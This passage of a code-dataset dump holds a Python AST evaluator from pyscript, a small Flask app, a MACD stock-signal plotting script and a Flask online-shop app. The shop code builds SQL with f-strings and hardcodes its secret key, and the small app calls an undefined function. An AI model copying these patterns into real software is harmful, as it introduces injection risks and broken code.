)\n if asyncio.iscoroutinefunction(func):\n return await func(*args, **kwargs)\n return func(*args, **kwargs)\n raise NameError(f\"function '{func_name}' is not callable (got {func})\")\n\n async def ast_functiondef(self, arg):\n \"\"\"Evaluate function definition.\"\"\"\n func = EvalFunc(arg, self.code_list, self.code_str)\n await func.eval_defaults(self)\n await func.eval_decorators(self)\n self.sym_table[func.get_name()] = func\n if self.sym_table == self.global_sym_table:\n # set up any triggers if this function is in the global context\n await self.global_ctx.trigger_init(func)\n return None\n\n async def ast_ifexp(self, arg):\n \"\"\"Evaluate if expression.\"\"\"\n return (\n await self.aeval(arg.body)\n if (await self.aeval(arg.test))\n else await self.aeval(arg.orelse)\n )\n\n async def ast_num(self, arg):\n \"\"\"Evaluate number.\"\"\"\n return arg.n\n\n async def ast_str(self, arg):\n \"\"\"Evaluate string.\"\"\"\n return arg.s\n\n async def ast_nameconstant(self, arg):\n \"\"\"Evaluate name constant.\"\"\"\n return arg.value\n\n async def ast_constant(self, arg):\n 
\"\"\"Evaluate constant.\"\"\"\n return arg.value\n\n async def ast_joinedstr(self, arg):\n \"\"\"Evaluate joined string.\"\"\"\n val = \"\"\n for arg1 in arg.values:\n this_val = await self.aeval(arg1)\n val = val + str(this_val)\n return val\n\n async def ast_formattedvalue(self, arg):\n \"\"\"Evaluate formatted value.\"\"\"\n val = await self.aeval(arg.value)\n if arg.format_spec is not None:\n fmt = await self.aeval(arg.format_spec)\n return f\"{val:{fmt}}\"\n return f\"{val}\"\n\n async def ast_get_names2_dict(self, arg, names):\n \"\"\"Recursively find all the names mentioned in the AST tree.\"\"\"\n if isinstance(arg, ast.Attribute):\n full_name = await self.ast_attribute_collapse(arg)\n if full_name is not None:\n names[full_name] = 1\n elif isinstance(arg, ast.Name):\n names[arg.id] = 1\n else:\n for child in ast.iter_child_nodes(arg):\n await self.ast_get_names2_dict(child, names)\n\n async def ast_get_names(self):\n \"\"\"Return list of all the names mentioned in our AST tree.\"\"\"\n names = {}\n if self.ast:\n await self.ast_get_names2_dict(self.ast, names)\n return [*names]\n\n def parse(self, code_str, filename=None):\n \"\"\"Parse the code_str source code into an AST tree.\"\"\"\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n self.ast = None\n if filename is not None:\n self.filename = filename\n try:\n if isinstance(code_str, list):\n self.code_list = code_str\n self.code_str = \"\\n\".join(code_str)\n elif isinstance(code_str, str):\n self.code_str = code_str\n self.code_list = code_str.split(\"\\n\")\n else:\n self.code_str = code_str\n self.code_list = []\n self.ast = ast.parse(self.code_str, filename=self.filename)\n return True\n except SyntaxError as err:\n self.exception_obj = err\n self.lineno = err.lineno\n self.col_offset = err.offset - 1\n self.exception = f\"syntax error {err}\"\n self.exception_long = self.format_exc(err, self.lineno, self.col_offset)\n return False\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception as err: # pylint: disable=broad-except\n self.exception_obj = err\n self.lineno = 1\n self.col_offset = 0\n self.exception = f\"parsing error {err}\"\n self.exception_long = self.format_exc(err)\n return False\n\n def format_exc(self, exc, lineno=None, col_offset=None, short=False):\n \"\"\"Format an multi-line exception message using lineno if available.\"\"\"\n if lineno is not None:\n if short:\n mesg = f\"In <{self.filename}> line {lineno}:\\n\"\n mesg += \" \" + self.code_list[lineno - 1]\n else:\n mesg = f\"Exception in <{self.filename}> line {lineno}:\\n\"\n mesg += \" \" + self.code_list[lineno - 1] + \"\\n\"\n if col_offset is not None:\n mesg += \" \" + \" \" * col_offset + \"^\\n\"\n mesg += f\"{type(exc).__name__}: {exc}\"\n else:\n mesg = f\"Exception in <{self.filename}>:\\n\"\n mesg += f\"{type(exc).__name__}: {exc}\"\n return mesg\n\n def get_exception(self):\n \"\"\"Return the last exception str.\"\"\"\n return self.exception\n\n def get_exception_obj(self):\n \"\"\"Return the last exception object.\"\"\"\n return self.exception_obj\n\n def get_exception_long(self):\n \"\"\"Return the last exception in a longer str form.\"\"\"\n return self.exception_long\n\n def set_local_sym_table(self, sym_table):\n \"\"\"Set the local symbol table.\"\"\"\n self.local_sym_table = sym_table\n\n def set_global_ctx(self, global_ctx):\n \"\"\"Set the global context.\"\"\"\n self.global_ctx = global_ctx\n if self.sym_table == self.global_sym_table:\n self.global_sym_table 
= global_ctx.get_global_sym_table()\n            self.sym_table = self.global_sym_table\n        else:\n            self.global_sym_table = global_ctx.get_global_sym_table()\n        if len(self.sym_table_stack) > 0:\n            self.sym_table_stack[0] = self.global_sym_table\n\n    def get_global_ctx(self):\n        \"\"\"Return the global context.\"\"\"\n        return self.global_ctx\n\n    def get_global_ctx_name(self):\n        \"\"\"Return the global context name.\"\"\"\n        return self.global_ctx.get_name()\n\n    def set_logger_name(self, name):\n        \"\"\"Set the context's logger name.\"\"\"\n        if self.logger:\n            for handler in self.logger_handlers:\n                self.logger.removeHandler(handler)\n        self.logger_name = name\n        self.logger = logging.getLogger(LOGGER_PATH + \".\" + name)\n        for handler in self.logger_handlers:\n            self.logger.addHandler(handler)\n\n    def get_logger_name(self):\n        \"\"\"Get the context's logger name.\"\"\"\n        return self.logger_name\n\n    def get_logger(self):\n        \"\"\"Get the context's logger.\"\"\"\n        return self.logger\n\n    def add_logger_handler(self, handler):\n        \"\"\"Add logger handler to this context.\"\"\"\n        self.logger.addHandler(handler)\n        self.logger_handlers.add(handler)\n\n    def remove_logger_handler(self, handler):\n        \"\"\"Remove logger handler from this context.\"\"\"\n        self.logger.removeHandler(handler)\n        self.logger_handlers.discard(handler)\n\n    def completions(self, root):\n        \"\"\"Return potential variable, function or attribute matches.\"\"\"\n        words = set()\n        num_period = root.count(\".\")\n        if num_period >= 1: # pylint: disable=too-many-nested-blocks\n            last_period = root.rfind(\".\")\n            name = root[0:last_period]\n            attr_root = root[last_period + 1 :]\n            if name in self.global_sym_table:\n                var = self.global_sym_table[name]\n                try:\n                    for attr in var.__dir__():\n                        if attr.lower().startswith(attr_root) and (\n                            attr_root != \"\" or attr[0:1] != \"_\"\n                        ):\n                            value = getattr(var, attr, None)\n                            if callable(value) or isinstance(value, EvalFunc):\n                                words.add(f\"{name}.{attr}\")\n                            else:\n                                words.add(f\"{name}.{attr}\")\n                except Exception: # pylint: disable=broad-except\n                    pass\n        sym_table = BUILTIN_AST_FUNCS_FACTORY.copy()\n        for name, value in builtins.__dict__.items():\n            if name[0] != \"_\" and name not in BUILTIN_EXCLUDE:\n                sym_table[name] = value\n        sym_table.update(self.global_sym_table.items())\n        for name, value in sym_table.items():\n            if name.lower().startswith(root):\n                if callable(value) or isinstance(value, EvalFunc):\n                    # used to be f\"{name}(\", but Jupyter doesn't always do the right thing with that\n                    words.add(name)\n                else:\n                    words.add(name)\n        return words\n\n    async def eval(self, new_state_vars=None):\n        \"\"\"Execute parsed code, with the optional state variables added to the scope.\"\"\"\n        self.exception = None\n        self.exception_obj = None\n        self.exception_long = None\n        if new_state_vars:\n            self.local_sym_table.update(new_state_vars)\n        if self.ast:\n            try:\n                val = await self.aeval(self.ast)\n                if isinstance(val, EvalStopFlow):\n                    return None\n                return val\n            except asyncio.CancelledError: # pylint: disable=try-except-raise\n                raise\n            except Exception as err: # pylint: disable=broad-except\n                if self.exception_long is None:\n                    self.exception_long = self.format_exc(\n                        err, self.lineno, self.col_offset\n                    )\n        return None\n\n    def dump(self):\n        \"\"\"Dump the AST tree for debugging.\"\"\"\n        return ast.dump(self.ast)\n", "sub_path": "custom_components/pyscript/eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 47422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": 
"logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "const.LOGGER_PATH", "line_number": 12, "usage_type": "name"}, {"api_name": "ast.get_docstring", "line_number": 175, "usage_type": "call"}, {"api_name": "ast.Call", "line_number": 205, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 205, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 210, "usage_type": "attribute"}, {"api_name": "asyncio.CancelledError", "line_number": 236, "usage_type": "attribute"}, {"api_name": "const.ALLOWED_IMPORTS", "line_number": 389, "usage_type": "name"}, {"api_name": "sys.modules", "line_number": 391, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 392, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 394, "usage_type": "attribute"}, {"api_name": "const.ALLOWED_IMPORTS", "line_number": 399, "usage_type": "name"}, {"api_name": "sys.modules", "line_number": 401, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 402, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 404, "usage_type": "attribute"}, {"api_name": "ast.Tuple", "line_number": 554, "usage_type": "attribute"}, {"api_name": "ast.Subscript", "line_number": 567, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 569, "usage_type": "attribute"}, {"api_name": "ast.BinOp", "line_number": 606, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 607, "usage_type": "call"}, {"api_name": "ast.BinOp", "line_number": 615, "usage_type": "call"}, {"api_name": "ast.Name", "line_number": 616, "usage_type": "call"}, {"api_name": "ast.Load", "line_number": 616, "usage_type": "call"}, {"api_name": "ast.Subscript", "line_number": 638, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 640, "usage_type": "attribute"}, {"api_name": "ast.Slice", "line_number": 644, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 657, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 683, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 686, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 689, "usage_type": "call"}, {"api_name": "ast.Load", "line_number": 689, "usage_type": "call"}, {"api_name": "ast.Store", "line_number": 699, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 701, "usage_type": "call"}, {"api_name": "ast.Store", "line_number": 705, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 711, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 889, "usage_type": "attribute"}, {"api_name": "ast.Starred", "line_number": 907, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 917, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 945, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 946, "usage_type": "attribute"}, {"api_name": "ast.Slice", "line_number": 948, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 983, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 985, "usage_type": "attribute"}, {"api_name": "asyncio.iscoroutinefunction", "line_number": 993, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 1051, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 1055, "usage_type": "attribute"}, {"api_name": "ast.iter_child_nodes", "line_number": 1058, "usage_type": "call"}, {"api_name": "ast.parse", 
"line_number": 1086, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 1095, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 1163, "usage_type": "call"}, {"api_name": "const.LOGGER_PATH", "line_number": 1163, "usage_type": "name"}, {"api_name": "builtins.__dict__.items", "line_number": 1208, "usage_type": "call"}, {"api_name": "builtins.__dict__", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "asyncio.CancelledError", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "ast.dump", "line_number": 1245, "usage_type": "call"}]}
+{"seq_id": "306120744", "text": "from flask import Flask\n\n\n\n\n\n\napp = Flask(__name__)\n\n\n\n\n@app.route('/')\ndef idx():\n\tt = open('./index.html','r')\n\tr = t.read()\n\tt.close()\n\treturn r\n\n\n\n@app.route('/get/')\ndef dataset(num_rows):\n\td = create_data(int(num_rows))\n\treturn d\n\n\n\n\nif __name__=='__main__':\n\tapp.run(debug=False, host='localhost',port=1000)\n\n\n", "sub_path": "http.py", "file_name": "http.py", "file_ext": "py", "file_size_in_byte": 327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "33435948", "text": "from data import data\r\nfrom pandas import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('fivethirtyeight')\r\n\r\n#This is a program used to query incoming stock data. \r\n\r\n# get the data from the excel file\r\ndf = pd.read_excel('companyData.xlsx')\r\n# Change the data frame to be indexed by date\r\ndf = df.set_index(pd.DatetimeIndex(df['date'].values))\r\n# make a graph\r\nplt.figure(figsize=(14.0,8.0))\r\nplt.plot(df['4. close'], label='close')\r\nplt.title('Daily close price')\r\nplt.xticks(rotation = 45)\r\nplt.xlabel('Date')\r\nplt.ylabel('Price $')\r\n# plt.show()\r\n\r\n# Calculate MACD and signal line indicators\r\n# Calculate the short term exponential moving average (EMA)\r\nshort_EMA = df['4. close'].ewm(span=12, adjust = False).mean()\r\n# Calculate long term exponential moving average\r\nlong_EMA = df['4. close'].ewm(span=26, adjust = False).mean()\r\n# calculate MACD line\r\nMACD = short_EMA - long_EMA\r\n# create signal line\r\nsignal = MACD.ewm(span=9, adjust= False).mean()\r\nplt.figure(figsize=(12.5, 5.0))\r\nplt.plot(df.index, MACD, label = 'DAL MACD', color='red')\r\nplt.plot(df.index, signal, label = 'Signal line', color='blue')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n\r\n# create new columns for data\r\ndf['MACD'] = MACD\r\ndf['Signal'] = signal\r\n\r\n# create function to buy or sell\r\ndef buy_sell(signal):\r\n buy = []\r\n sell = []\r\n flag = -1\r\n for i in range(0, len(signal)):\r\n if signal['MACD'][i] > signal['Signal'][i]:\r\n sell.append(np.nan)\r\n if flag != 1:\r\n buy.append((signal['4. close'][i]))\r\n flag = 1\r\n else:\r\n buy.append(np.nan)\r\n elif signal['MACD'][i] < signal['Signal'][i]:\r\n buy.append(np.nan)\r\n if flag != 0:\r\n sell.append((signal['4. close'][i]))\r\n flag = 0\r\n else:\r\n sell.append(np.nan)\r\n else:\r\n sell.append(np.nan)\r\n buy.append(np.nan)\r\n return (buy, sell)\r\n# print(short_EMA)\r\n# print(df)\r\na = buy_sell(df)\r\ndf['Buy_Signal_Price'] = a[0]\r\ndf['Sell_Signal_Price'] = a[1]\r\n#show the data\r\nplt.figure(figsize=(12.5, 4.5))\r\nplt.scatter(df.index, df['Buy_Signal_Price'], color='green', label='Buy', marker='^', alpha=1)\r\nplt.scatter(df.index, df['Sell_Signal_Price'], color='red', label='Sell', marker='v', alpha=1)\r\nplt.plot(df.index, df['4. 
close'], label='Close Price', alpha = 0.35)\r\nplt.title('Close price buy/sell signals')\r\nplt.xlabel('Date')\r\nplt.ylabel('Close price $')\r\nplt.legend(loc = 'upper left')\r\nplt.show()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2570, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "pandas.pandas.read_excel", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.pandas", "line_number": 10, "usage_type": "name"}, {"api_name": "pandas.pandas.DatetimeIndex", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.pandas", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 53, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 55, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 60, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 62, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 63, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 71, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 71, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 72, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 72, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 73, "usage_type": "call"}, {"api_name": 
"matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 76, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 76, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 77, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 77, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 78, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 78, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 79, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 79, "usage_type": "name"}]}
+{"seq_id": "303776768", "text": "import os\r\n\r\nimport requests\r\nfrom flask import Flask, render_template, request, make_response, jsonify, abort, session\r\nfrom flask_login import LoginManager, login_user, login_required, logout_user, current_user\r\nfrom flask_wtf import FlaskForm\r\nfrom werkzeug.utils import redirect\r\nfrom wtforms import PasswordField, StringField, TextAreaField, SubmitField, BooleanField\r\nfrom wtforms.fields.html5 import EmailField\r\nimport sqlite3\r\nimport shutil\r\n\r\n# noinspection PyUnresolvedReferences\r\nfrom wtforms.validators import DataRequired\r\n# noinspection PyUnresolvedReferences\r\nfrom data import db_session\r\n# noinspection PyUnresolvedReferences\r\nfrom data.users import User\r\n# noinspection PyUnresolvedReferences\r\nfrom data.goods import Goods\r\n# noinspection PyUnresolvedReferences\r\nfrom data.orders import Orders\r\n\r\napp = Flask(__name__)\r\napp.config['SECRET_KEY'] = 'yandexlyceum_secret_key'\r\nlogin_manager = LoginManager()\r\nlogin_manager.init_app(app)\r\n\r\n\r\nclass RegisterForm(FlaskForm):\r\n email = EmailField('Почта', validators=[DataRequired()])\r\n password = PasswordField('Пароль', validators=[DataRequired()])\r\n password_again = PasswordField('Повторите пароль', validators=[DataRequired()])\r\n name = StringField('Имя пользователя', validators=[DataRequired()])\r\n submit = SubmitField('Войти')\r\n\r\n\r\nclass LoginForm(FlaskForm):\r\n email = EmailField('Почта', validators=[DataRequired()])\r\n password = PasswordField('Пароль', validators=[DataRequired()])\r\n remember_me = BooleanField('Запомнить меня')\r\n submit = SubmitField('Войти')\r\n\r\n\r\n@login_manager.user_loader\r\ndef load_user(user_id):\r\n sessions = db_session.create_session()\r\n return sessions.query(User).get(user_id)\r\n\r\n\r\ndef main():\r\n db_session.global_init(\"db/shop.sqlite\")\r\n app.run(port=8080, host='127.0.0.1')\r\n\r\n\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n return make_response(jsonify({'error': 'Not found'}), 404)\r\n\r\n\r\n@app.route(\"/\", methods=['GET', 'POST'])\r\ndef index():\r\n lis = []\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).all()\r\n if request.method == 'POST':\r\n for i in request.form.getlist('model'):\r\n good = sessions.query(Goods).filter(Goods.id == int(i)).first()\r\n lis.append(good)\r\n return render_template(\"index.html\", title='Отфильтрованные товары', goods=lis)\r\n return render_template(\"index.html\", title='Интернет-магазин', goods=goods)\r\n\r\n\r\n@app.route('/login', methods=['GET', 'POST'])\r\ndef login():\r\n form = LoginForm()\r\n if form.validate_on_submit():\r\n session = db_session.create_session()\r\n user = session.query(User).filter(User.email == form.email.data).first()\r\n if user and user.check_password(form.password.data):\r\n login_user(user, remember=form.remember_me.data)\r\n return redirect(\"/\")\r\n return render_template('login.html', title='Авторизация',\r\n message=\"Неправильный логин или пароль\",\r\n form=form)\r\n return render_template('login.html', title='Авторизация', form=form)\r\n\r\n\r\n@app.route('/logout')\r\n@login_required\r\ndef logout():\r\n logout_user()\r\n return redirect(\"/\")\r\n\r\n\r\n@app.route('/register', methods=['GET', 'POST'])\r\ndef reqister():\r\n form = RegisterForm()\r\n if form.validate_on_submit():\r\n if form.password.data != form.password_again.data:\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Пароли не совпадают\")\r\n session 
= db_session.create_session()\r\n if session.query(User).filter(User.email == form.email.data).first():\r\n return render_template('register.html', title='Регистрация',\r\n form=form,\r\n message=\"Такой пользователь уже есть\")\r\n user = User(\r\n name=form.name.data,\r\n email=form.email.data\r\n )\r\n user.set_password(form.password.data)\r\n session.add(user)\r\n session.commit()\r\n return redirect('/login')\r\n return render_template('register.html', title='Регистрация', form=form)\r\n\r\n\r\n@app.route(\"/info/\")\r\ndef info(goods_id):\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).filter(Goods.id == goods_id).first()\r\n return render_template(\"info.html\", title='Информация о товаре', goods=goods)\r\n\r\n\r\n@app.route(\"/add/\")\r\ndef add(goods_id):\r\n sessions = db_session.create_session()\r\n goods = sessions.query(Goods).filter(Goods.id == goods_id).first()\r\n if goods.value > 0:\r\n if 'add' in session:\r\n zn = session['add']\r\n else:\r\n zn = []\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value + 1\r\n WHERE id = {goods.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n ok, sp = True, 0\r\n for i in range(len(zn)):\r\n if goods.id in zn[i]:\r\n ok = False\r\n sp = i\r\n if ok:\r\n zn.append([goods.id, goods.name, goods.image, goods.coast, goods.value])\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n INSERT INTO orders \r\n VALUES ({goods.id}, '{goods.name}', '{goods.content}', '{goods.image}', {goods.coast}, 1)\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n else:\r\n zn[sp][-1] += 1\r\n\r\n session['add'] = zn\r\n return render_template(\"add.html\", title='Добавление товара', goods=goods)\r\n else:\r\n return render_template(\"add.html\", title='Добавление товара', goods=goods, message='нет на скаладе')\r\n\r\n\r\n@app.route(\"/basket\", methods=['GET', 'POST'])\r\ndef basket():\r\n if current_user.is_authenticated == True:\r\n if request.method == 'POST':\r\n button = request.form['button']\r\n but = int(button.split()[1])\r\n sessions = db_session.create_session()\r\n orders = sessions.query(Orders).filter(Orders.id == but).first()\r\n goods = sessions.query(Goods).filter(Goods.id == but).first()\r\n if button.split()[0] == '2':\r\n if orders.value + 1 <= goods.value:\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value + 1\r\n WHERE id = {orders.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n if button.split()[0] == '1':\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n if orders.value - 1 > 0:\r\n sql = f\"\"\"\r\n UPDATE orders \r\n SET value = value - 1\r\n WHERE id = {orders.id}\r\n \"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n if 'add' in session:\r\n goods = session['add']\r\n else:\r\n goods = []\r\n sessions = db_session.create_session()\r\n orders = sessions.query(Orders).all()\r\n for i in range(len(orders)):\r\n goods[i][-1] = orders[i].value\r\n return render_template(\"basket.html\", title='Корзина', goods=goods)\r\n else:\r\n return render_template(\"basket.html\", title='Корзина', me='Авторизуйтесь, чтобы просматривать корзину!')\r\n\r\n\r\n@app.route(\"/clear\")\r\ndef clear():\r\n if 'add' in session:\r\n session['add'] = []\r\n goods = session['add']\r\n\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = \"\"\"DELETE FROM orders\"\"\"\r\n 
cur.execute(sql)\r\n conn.commit()\r\n return render_template(\"basket.html\", title='Корзина', goods=goods, message='Ваша корзина пуста')\r\n\r\n\r\n@app.route(\"/order\")\r\ndef order():\r\n # нужно создать БД с заказами пользователей\r\n # вывод общей стоимости товара\r\n\r\n sessions = db_session.create_session()\r\n order = sessions.query(Orders).all()\r\n goods = sessions.query(Goods).all()\r\n total = 0\r\n for i in order:\r\n total += i.coast * i.value\r\n for item in order:\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = f\"\"\"UPDATE goods SET value = value - {item.value} WHERE id = {item.id}\"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n if 'add' in session:\r\n session['add'] = []\r\n goods = session['add']\r\n\r\n conn = sqlite3.connect('db/shop.sqlite')\r\n cur = conn.cursor()\r\n sql = \"\"\"DELETE FROM orders\"\"\"\r\n cur.execute(sql)\r\n conn.commit()\r\n\r\n return render_template(\"order.html\", title='Оформление заказа', goods=goods, total=total)\r\n\r\n\r\n@app.route('/map')\r\ndef map():\r\n mash = 16\r\n mark = '37.74164199829102,55.78153275636508,pm2rdm'\r\n mark2 = ''\r\n map_request = 'https://static-maps.yandex.ru/1.x/?l=map&pt=' + mark + ',' + '&z=' + str(mash)\r\n response = requests.get(map_request)\r\n map_file = 'map.png'\r\n with open(map_file, \"wb\") as file:\r\n file.write(response.content)\r\n\r\n sourse = os.getcwd() + '/map.png'\r\n dest = os.getcwd() + '/static/img/map.png'\r\n shutil.move(sourse, dest)\r\n return render_template('map.html', title='Пункт выдачи')\r\n\r\n\r\n@app.route(\"/cookie_test\")\r\ndef cookie_test():\r\n visits_count = int(request.cookies.get(\"visits_count\", 0))\r\n if visits_count:\r\n res = make_response(f\"Вы пришли на эту страницу {visits_count + 1} раз\")\r\n res.set_cookie(\"visits_count\", str(visits_count + 1),\r\n max_age=60 * 60 * 24 * 365 * 2)\r\n else:\r\n res = make_response(\r\n \"Вы пришли на эту страницу в первый раз за последние 2 года\")\r\n res.set_cookie(\"visits_count\", '1',\r\n max_age=60 * 60 * 24 * 365 * 2)\r\n return res\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 10718, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "74", "api": [{"api_name": "flask.Flask", "line_number": 24, "usage_type": "call"}, {"api_name": "flask_login.LoginManager", "line_number": 26, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 30, "usage_type": "name"}, {"api_name": "wtforms.fields.html5.EmailField", "line_number": 31, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 31, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 32, "usage_type": "call"}, {"api_name": "wtforms.PasswordField", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 33, "usage_type": "call"}, {"api_name": "wtforms.StringField", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.validators.DataRequired", "line_number": 34, "usage_type": "call"}, {"api_name": "wtforms.SubmitField", "line_number": 35, "usage_type": "call"}, {"api_name": "flask_wtf.FlaskForm", "line_number": 38, "usage_type": "name"}, {"api_name": "wtforms.fields.html5.EmailField", "line_number": 39, "usage_type": "call"}, {"api_name": 
